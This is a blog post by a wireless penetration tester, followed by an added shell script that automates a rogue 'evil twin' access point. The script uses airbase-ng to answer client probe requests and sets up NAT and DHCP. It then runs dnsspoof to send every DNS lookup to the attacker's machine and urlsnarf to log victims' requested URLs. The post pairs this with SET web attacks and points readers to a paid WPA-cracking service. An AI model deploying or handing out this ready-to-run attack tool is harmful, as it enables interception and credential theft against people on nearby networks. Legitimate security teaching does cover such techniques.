
Friday, 4 November 2011

A quick 'n' evil Access Point

I have been carrying out wireless assessments for some clients recently, and to be honest, if the client is security-savvy enough to be requesting a wireless pentest, then usually (I said usually ;) they are savvy enough to have secured their network in a reasonable manner. Finding one set up with WEP is certainly not going to happen. If you are up against WPA/WPA2, then you should check out Elcomsoft Wireless Security Auditor, purely for its GPU support and password permutations.
Another good resource is http://tools.question-defense.com/wpa-password-cracker

They charge $10 to crack your captured WPA handshake, and have a huge dictionary of 1.5 billion words.

Anyway, suppose you have explored the aforementioned methods and have had little luck. Time for another way.

The next best thing to cracking a wireless network key is to be able to force the clients on that network to connect to your network instead. Various tools and techniques exist for this, including KARMA, Jasager, and the Social-Engineer Toolkit (SET). I have had varying amounts of success with these tools, and blindly running a tool without fully understanding exactly what is happening under the hood is often a bad idea, so I decided the best thing for me to do was to go away and work my way through the excellent Wireless Security Megaprimer available here: http://www.securitytube.net/groups?operation=viewall&groupId=0
This course takes you through each step manually, so it gives you a decent understanding of the processes that make up this technique of coercing someone into connecting to your wireless network.

Working through this course, I have realised there are a great many commands to run through in order to get your fake access point up and running properly, so I have whipped up a bash script to automate all this. Feel free to make use of it, but make sure you have a basic knowledge of the process first, or better still, check out the SecurityTube training videos first.

Okay, this script was designed for those using BackTrack inside a VM, with a bridged connection through the host to provide internet access, and a wireless ALFA card passed through to the VM to host the fake access point.
I have also included in the script the commands to resolve the SIOCSIFFLAGS error, common with ALFA cards running under VMware.
I don't see why it wouldn't work in any other setup; basically you just need to copy it to your BackTrack machine, chmod 755 it to make it executable, and off you go.
It will set up a fake access point and also spoof any other access points that nearby computers are probing for. Once this is done, it finishes by starting dsniff's dnsspoof and urlsnarf to redirect any connected clients to your own machine. I use this alongside the SET website attacks, and it works very well.
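The script itself is not reproduced on this page, so what follows is an added reconstruction of the command sequence described above, written for this edit and not the post's own script. It uses aircrack-ng's airbase-ng for the probe-answering fake AP and the dsniff tools (dnsspoof, urlsnarf) for the redirect. The interface names (wlan0, mon0, eth0, at0), the rtl8187 driver for the ALFA card, the 10.0.0.0/24 subnet, the ESSID and the 8.8.8.8 resolver are all assumptions; DRY_RUN=1, the default, only prints the commands so the sequence can be read without root.

```shell
#!/bin/sh
# Added example, not the post's own script: the airbase-ng fake-AP sequence the
# post describes, with a DRY_RUN switch so it can be read (or tested) without root.
# Assumed names (change to suit): wlan0 = ALFA card (rtl8187 driver), mon0 = the
# monitor interface airmon-ng creates, eth0 = the bridged NIC with internet,
# at0 = the tap interface airbase-ng creates, AP subnet 10.0.0.0/24.
set -eu

DRY_RUN=${DRY_RUN:-1}        # DRY_RUN=0 actually runs the commands (as root)
WLAN=${WLAN:-wlan0}
MON=${MON:-mon0}
UPSTREAM=${UPSTREAM:-eth0}
ESSID=${ESSID:-FreeWifi}     # no spaces: the command string is word-split below
CHANNEL=${CHANNEL:-6}
DHCPD=${DHCPD:-dhcpd}        # called dhcpd3 on BackTrack 5
TAP=at0
AP_IP=10.0.0.1
AP_NET=10.0.0.0
AP_MASK=255.255.255.0

run() {
    if [ "$DRY_RUN" = 1 ]; then echo "[dry-run] $*"; else "$@"; fi
}

# SIOCSIFFLAGS "Unknown error 132" on an ALFA under VMware means the radio is
# rfkill-blocked: unblock it and reload the driver before touching the card.
fix_siocsifflags() {
    run rfkill unblock all
    run rmmod rtl8187
    run modprobe rtl8187
}

# Monitor mode; on BackTrack 5 airmon-ng creates mon0 on top of wlan0.
start_monitor() {
    run airmon-ng start "$WLAN"
}

# -e/-c: the AP's own name and channel.  -P: answer every probe request with the
# probed ESSID (the Karma trick).  -C 30: also beacon those probed ESSIDs for
# 30 s so a client that remembers "CoffeeShop" sees it and auto-joins.  -v: verbose.
airbase_cmd() {
    echo "airbase-ng -e $ESSID -c $CHANNEL -P -C 30 -v $MON"
}

start_fake_ap() {
    if [ "$DRY_RUN" = 1 ]; then
        echo "[dry-run] $(airbase_cmd) &"
    else
        $(airbase_cmd) >/tmp/airbase.log 2>&1 &
        sleep 3    # give airbase-ng time to create at0
    fi
}

# Bring up the tap and route clients out through the bridged NIC.
setup_network() {
    run ifconfig "$TAP" up "$AP_IP" netmask "$AP_MASK"
    run sysctl -w net.ipv4.ip_forward=1
    run iptables -t nat -A POSTROUTING -o "$UPSTREAM" -j MASQUERADE
    run iptables -A FORWARD -i "$TAP" -o "$UPSTREAM" -j ACCEPT
}

# DHCP: clients get us as gateway. DNS points at a real resolver (8.8.8.8 is an
# assumption) because dnsspoof forges answers on the wire; it is not a resolver.
dhcpd_conf() {
    cat <<EOF
subnet $AP_NET netmask $AP_MASK {
    range 10.0.0.100 10.0.0.200;
    option routers $AP_IP;
    option domain-name-servers 8.8.8.8;
}
EOF
}

# dnsspoof hosts file is "<ip> <pattern>"; "*" sends every name to our box,
# where the SET web server is listening.
dnsspoof_hosts() {
    echo "$AP_IP *"
}

start_mitm() {
    if [ "$DRY_RUN" = 1 ]; then
        echo "[dry-run] $DHCPD -cf /tmp/dhcpd.conf -lf /tmp/dhcpd.leases $TAP"
        echo "[dry-run] dnsspoof -i $TAP -f /tmp/hosts.spoof &"
        echo "[dry-run] urlsnarf -i $TAP &"
    else
        dhcpd_conf > /tmp/dhcpd.conf
        dnsspoof_hosts > /tmp/hosts.spoof
        touch /tmp/dhcpd.leases      # dhcpd refuses to start without a leases file
        "$DHCPD" -cf /tmp/dhcpd.conf -lf /tmp/dhcpd.leases "$TAP"
        dnsspoof -i "$TAP" -f /tmp/hosts.spoof >/tmp/dnsspoof.log 2>&1 &
        urlsnarf -i "$TAP" >/tmp/urlsnarf.log 2>&1 &
    fi
}

main() { fix_siocsifflags; start_monitor; start_fake_ap; setup_network; start_mitm; }
main
```

Run it as `DRY_RUN=0 sh evilap.sh` as root once the SET web attack is listening on 10.0.0.1:80; every name a connected client resolves then lands on that page, and urlsnarf logs what they request. One caveat worth knowing before blaming the tools: airbase-ng's AP is open, and a modern client whose saved profile for "CoffeeShop" is WPA/WPA2 will not associate with an open network of the same name, so the probe-answering trick mostly catches devices carrying saved open (hotel, cafe, airport) networks.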